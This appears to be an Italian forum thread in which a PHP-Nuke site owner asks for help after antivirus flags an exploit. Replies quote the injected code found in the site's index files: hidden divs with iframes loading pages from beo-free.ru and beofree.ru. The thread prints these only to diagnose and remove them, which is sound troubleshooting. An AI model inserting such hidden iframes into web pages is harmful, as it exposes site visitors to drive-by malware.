ho cancellato e riscaricato tutto su mbnet.altervista.org..
Ma quando mi collego avast mi rileva un malware, ma dove cavolo si è posizionato sto virus maledetto che ho cancellato tutto???
JS:Pdfka-PL [Expl]
Printable View
ho cancellato e riscaricato tutto su mbnet.altervista.org..
Ma quando mi collego avast mi rileva un malware, ma dove cavolo si è posizionato sto virus maledetto che ho cancellato tutto???
JS:Pdfka-PL [Expl]
Controllando il sorgente ho trovato, in cima a tutto il resto, questo codice:
Probabilmente si nasconde nei file del template stesso :wink:Codice PHP:<div style="display:none">wcyniaoszijylsungmonbczpxnyewdw</div>
<div style="display:none">qmlwvrdugrmjmtsbksuuwlajgvrrvwp<iframe width=521 height=610 src="http://beo-free.ru:8080/index.php" ></iframe></div>
quindi devo cancellare quei codici li ma nel template??
Devi sicuramente eliminare quel codice e, suppongo, si trovi nei file del template :wink:Citazione:
Originalmente inviato da mbnet
Quel codice si trova in tutti i file index.htm e index.php
Ma mi spiegate come cavolo ha fatto ad andarci?
In più tra l'altro lo cancello e si ricrea...Codice PHP:<div style="display:none">amyoeqavrdrvvoaqazpfhpfginkfmjv<iframe width=194 height=816 src="http://beofree.ru:8080/index.php" ></iframe></div>
Fa una scansione completa con antivirus e antispyware sul tuo pc e cambia la password del sito :wink:
allora si sono rigenerati un'altra volta, ho cancellato tutto ancora...
domani formatto il pc e riprovo, questa non mi è mai successa....
...Citazione:
Originalmente inviato da mbnet
Io personalmente sono contro la formattazione (se non per casi impossibili).
Io andrei con: avira; spybot e combofix.
Dopo questi tre il tuo pc sarà inevitabilmente "pulito".
Nel caso si generasse ancora allora si dovrebbe rivedere lo script usato (nel tuo caso: PHP-Nuke Copyright © 2005) magari è quello che è buggato" :wink:
-
Adesso c'è disponibile la 8.1: http://phpnuke.org/modules.php?name=Release
non c'è niente da fare ho caricato tutto di nuovo da un altro pc, tra l'altro nuovo...
e ora ho dei cavalli di troia nel sito pazzesco...
penso di darci su...